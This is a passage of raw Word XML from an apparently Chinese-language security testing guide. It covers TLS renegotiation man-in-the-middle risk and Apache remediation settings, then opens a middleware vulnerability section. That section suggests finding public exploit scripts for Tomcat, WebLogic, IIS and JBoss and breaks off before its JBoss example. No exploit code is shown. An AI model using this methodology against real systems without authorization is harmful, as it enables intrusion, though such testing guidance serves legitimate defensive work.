          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>client H</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ello</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以创建一个重新协商，建立重新协商的</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的是</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新密钥，增强所用密码组的保密性和从</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的身份</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAAC30" w14:textId="79FD949A" w:rsidR="005B5C0D" w:rsidRPr="005C2E0F" w:rsidRDefault="00C706D2" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人攻击中，攻击者会主动</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窃听，他将截获客户端和服务器之间的连接，并使他们认为他们是在直接通话，而实</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>际上他们是通过攻击者的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转接来通话的。要完成中间人攻击</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人必须截获客户端和服务器间的所有通信信息，这样中间人可以选择有用的信息并且它可</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以将新的信息随意的插入</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C9968" w14:textId="77777777" w:rsidR="005B5C0D" w:rsidRPr="005C2E0F" w:rsidRDefault="005B5C0D" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4D502" w14:textId="4F7E906E" w:rsidR="00AD5AED" w:rsidRPr="005C2E0F" w:rsidRDefault="00AD5AED" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545765BA" w14:textId="4E9ED16E" w:rsidR="00A944EF" w:rsidRPr="005C2E0F" w:rsidRDefault="005B5C0D" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="006B6E8E" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6EA3B" w14:textId="77777777" w:rsidR="00AD5AED" w:rsidRPr="005C2E0F" w:rsidRDefault="00AD5AED" w:rsidP="005C2E0F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>renegotiation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议或限制</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重协商数，以防止</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击：在</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache 2.2.15</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上版本中，可以通过在配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpd.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，添加如下字串：</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSLInsecureRenegotiation Off</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；如使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本低于</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.15</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以通过限制</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重协商的次数防止</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700164D1" w14:textId="3E150FEA" w:rsidR="00AD5AED" w:rsidRPr="00B44623" w:rsidRDefault="00AD5AED" w:rsidP="00B44623">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用防火墙防止中间人攻击：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用防火墙，对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求头进行过滤和监控，舍弃嵌入式的</w:t>
      </w:r>
      <w:r w:rsidR="005813D5" w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求行，以防止中间人攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1151A6" w14:textId="7C718711" w:rsidR="00B44623" w:rsidRPr="00B44623" w:rsidRDefault="00B44623" w:rsidP="00B44623">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F47CA" w14:textId="7728923C" w:rsidR="009F1C76" w:rsidRPr="00A82BA3" w:rsidRDefault="00680E2B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc498434568"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件相关漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="753BD461" w14:textId="0EA6D024" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="009F1C76" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jboss</w:t>
      </w:r>
      <w:r w:rsidR="006A6C98" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及其他的中间件的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F7757" w14:textId="4C757C2D" w:rsidR="009F1C76" w:rsidRPr="005E3E54" w:rsidRDefault="009F1C76" w:rsidP="005E3E54">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00990959" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据目标系统所使用的中间件版本，查找其公开漏洞及其利用脚本。如</w:t>
      </w:r>
      <w:r w:rsidR="00990959" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebSphere</w:t>
      </w:r>
      <w:r w:rsidR="00F11D37" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理控制台弱口令</w:t>
      </w:r>
      <w:r w:rsidR="00990959" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00A842F0" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发序列化</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短文件名泄漏、</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBoss</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
      <w:r w:rsidR="00990959" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。下面以</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBoss</w:t>
      </w:r>
      <w:r w:rsidR="000700AD" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
      <w:r w:rsidR="00990959" w:rsidRPr="005E3E54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞为例进行说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3978382F" w14:textId="77777777" w:rsidR="00092E41" w:rsidRPr="005E3E54" w:rsidRDefault="00092E41" w:rsidP="005E3E54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
